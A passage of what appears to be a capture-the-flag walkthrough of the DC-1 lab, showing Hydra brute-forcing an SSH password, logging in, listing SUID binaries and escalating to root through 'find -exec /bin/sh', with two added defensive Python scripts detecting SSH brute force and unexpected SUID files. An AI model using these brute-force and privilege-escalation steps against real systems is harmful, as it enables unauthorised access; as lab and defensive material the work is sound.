[ATTEMPT] target 192.168.1.3 - login "flag4" - pass "fisher" - 139 of 3562 [child 10] (0/3)
[ATTEMPT] target 192.168.1.3 - login "flag4" - pass "island" - 140 of 3562 [child 9] (0/3)
[ATTEMPT] target 192.168.1.3 - login "flag4" - pass "john" - 141 of 3562 [child 15] (0/3)
[ATTEMPT] target 192.168.1.3 - login "flag4" - pass "joshua" - 142 of 3562 [child 0] (0/3)
[ATTEMPT] target 192.168.1.3 - login "flag4" - pass "karen" - 143 of 3562 [child 7] (0/3)
[ATTEMPT] target 192.168.1.3 - login "flag4" - pass "marley" - 144 of 3562 [child 1] (0/3)
[ATTEMPT] target 192.168.1.3 - login "flag4" - pass "orange" - 145 of 3562 [child 12] (0/3)
[22][ssh] host: 192.168.1.3 login: flag4 password: orange
[STATUS] attack finished for 192.168.1.3 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-20 11:58:01
root@JIYE:~/tmp/DC1#

The cracked password is orange

Log in
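The hydra run above looks very different from the server side, so here is an added example (not part of the original post) of the detection a defender would run over sshd's auth.log: a sliding-window counter per source IP that raises a medium alert on a burst of failed logins and a high alert when the same source then logs in successfully. The log lines are constructed to resemble Debian sshd output for this scenario, and the year is supplied as an assumption because auth.log does not record it.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Debian sshd auth.log line shapes (the year is not logged, so it is supplied).
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)

# Constructed sample: one stray failure from the host machine, then a burst of
# failures from 192.168.1.6 (the Kali box) inside three seconds, the shape a
# parallel hydra run leaves behind, followed by a successful login.
SAMPLE_LOG: List[str] = (
    ["Aug 20 11:50:01 DC-1 sshd[3990]: Failed password for flag4 from 192.168.1.2 port 50110 ssh2"]
    + [
        f"Aug 20 11:58:0{i // 3} DC-1 sshd[{4000 + i}]: Failed password for flag4 "
        f"from 192.168.1.6 port {40200 + i} ssh2"
        for i in range(8)
    ]
    + ["Aug 20 11:58:03 DC-1 sshd[4020]: Accepted password for flag4 from 192.168.1.6 port 40220 ssh2"]
)


def parse_line(line: str, year: int = 2020) -> Optional[Tuple[datetime, str, str, str]]:
    """Return (timestamp, 'Failed'|'Accepted', user, source_ip), or None if
    the line is not a password-auth event."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(lines, threshold: int = 10, window_s: int = 60) -> List[Dict]:
    """Sliding-window detector: a medium alert once one source IP reaches
    `threshold` failures within `window_s` seconds, and a high alert when a
    flagged source then logs in successfully (exactly what hydra -f leaves)."""
    failures = defaultdict(deque)      # ip -> timestamps of recent failures
    flagged = set()
    alerts: List[Dict] = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, ip = parsed
        recent = failures[ip]
        while recent and (ts - recent[0]).total_seconds() > window_s:
            recent.popleft()           # drop failures outside the window
        if result == "Failed":
            recent.append(ts)
            if len(recent) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({"severity": "medium", "ip": ip, "user": user,
                               "reason": f"{len(recent)} failed logins within {window_s}s"})
        elif ip in flagged:
            alerts.append({"severity": "high", "ip": ip, "user": user,
                           "reason": f"successful login after {len(recent)} recent failures"})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG, threshold=5):
        print(alert)
```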

root@JIYE:~/tmp/DC1# ssh flag4@192.168.1.3
The authenticity of host '192.168.1.3 (192.168.1.3)' can't be established.
ECDSA key fingerprint is SHA256:89B+YqcNl4cSf/BZk26MQG1QeW4BvBlVENMbTRhVhsU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? y
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '192.168.1.3' (ECDSA) to the list of known hosts.
flag4@192.168.1.3's password:
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
flag4@DC-1:~$

List the files and get flag4

flag4@DC-1:~$ ls
flag4.txt
flag4@DC-1:~$
flag4@DC-1:~$
flag4@DC-1:~$ cat flag4.txt
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy. Or maybe it is?
flag4@DC-1:~$

The hint: can you use the same method to find root's flag? Maybe it's hard, maybe not

Trying to cd into root's home directory fails, so privilege escalation is next

flag4@DC-1:~$ cd /root/
-bash: cd: /root/: Permission denied
flag4@DC-1:~$

0x10. Privilege escalation

Check whether any system commands have the SUID bit set.

A SUID binary runs with the privileges of its owner for as long as the command executes (root, for the files listed below); if a SUID-root command can be made to launch bash, that bash has root privileges.

root trusts the SUID binary, the SUID binary trusts bash, so bash ends up with root privileges

find / -perm -4000 2>/dev/null   // list commands with the SUID bit set

flag4@DC-1:~$ find / -perm -4000 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
flag4@DC-1:~$
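As the defender's counterpart to the listing above, here is an added example (not from the original post) that audits a `find / -perm -4000` listing against an expected baseline and flags deviations, and that parses `id` output to spot a process whose effective UID differs from its real UID, which is what a shell inherited from a setuid binary looks like. The listing is the one captured on DC-1; the baseline is constructed for this example (an assumption, not a real Debian package manifest).

```python
import re
from typing import Dict, List, Set, Tuple

# The `find / -perm -4000` listing captured on DC-1 above, embedded verbatim.
DC1_SUID_LISTING = """\
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
"""

# Constructed baseline (assumption): the setuid files this host is *expected*
# to carry, as an admin would record them from a clean build of the same
# release. For this example it is everything above except /usr/bin/find.
EXPECTED_SUID: Set[str] = {p for p in DC1_SUID_LISTING.split() if p != "/usr/bin/find"}

ID_FIELD = re.compile(r"\b(uid|gid|euid|egid)=(\d+)\(([^)]*)\)")


def parse_id_output(line: str) -> Dict[str, Tuple[int, str]]:
    """Parse `id` output such as
    'uid=1001(flag4) gid=1001(flag4) euid=0(root) groups=0(root),1001(flag4)'
    into {'uid': (1001, 'flag4'), 'euid': (0, 'root'), ...}."""
    return {key: (int(num), name) for key, num, name in ID_FIELD.findall(line)}


def privilege_mismatch(line: str) -> bool:
    """True when the effective UID differs from the real UID: the process got
    its privileges from a setuid binary, not from a login."""
    ids = parse_id_output(line)
    real = ids["uid"][0]
    effective = ids.get("euid", ids["uid"])[0]   # `id` omits euid when equal
    return effective != real


def suid_deviations(listing: str, expected: Set[str]) -> Dict[str, List[str]]:
    """Compare a `find / -perm -4000` listing with the baseline. 'unexpected'
    are setuid files that should not be; 'missing' are baseline entries that
    lost the bit or disappeared, which also deserves a look."""
    present = {ln.strip() for ln in listing.splitlines() if ln.strip()}
    return {"unexpected": sorted(present - expected),
            "missing": sorted(expected - present)}


def remediation(deviations: Dict[str, List[str]]) -> List[str]:
    """Commands an admin would run to strip the bit from unexpected files."""
    return [f"chmod u-s {path}" for path in deviations["unexpected"]]


if __name__ == "__main__":
    dev = suid_deviations(DC1_SUID_LISTING, EXPECTED_SUID)
    print("unexpected setuid files:", dev["unexpected"])
    print("fix:", *remediation(dev))
    shell = "uid=1001(flag4) gid=1001(flag4) euid=0(root) groups=0(root),1001(flag4)"
    print("euid/uid mismatch:", privilege_mismatch(shell))
```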

find will do

Now put it to use

flag4@DC-1:~$ find /root -exec "whoami" \; 
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
flag4@DC-1:~$

It runs as root

Escalate

flag4@DC-1:~$ find /root -exec "/bin/bash" \;      
bash-4.2$ id
uid=1001(flag4) gid=1001(flag4) groups=1001(flag4)
bash-4.2$

Oops, that flopped! (bash drops an effective UID that differs from its real UID when it starts, which is why euid=0 is missing.) Try another shell

bash-4.2$ find /root -exec "/bin/sh" \;    
# id
uid=1001(flag4) gid=1001(flag4) euid=0(root) groups=0(root),1001(flag4)
#

Success 😭

# pwd
/home/flag4
# cd /root
# ls
thefinalflag.txt
# cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
#

0x11. All that's left is to clean up and leave; I'm worn out...

------------- So much to say, so little space; see you next time -------------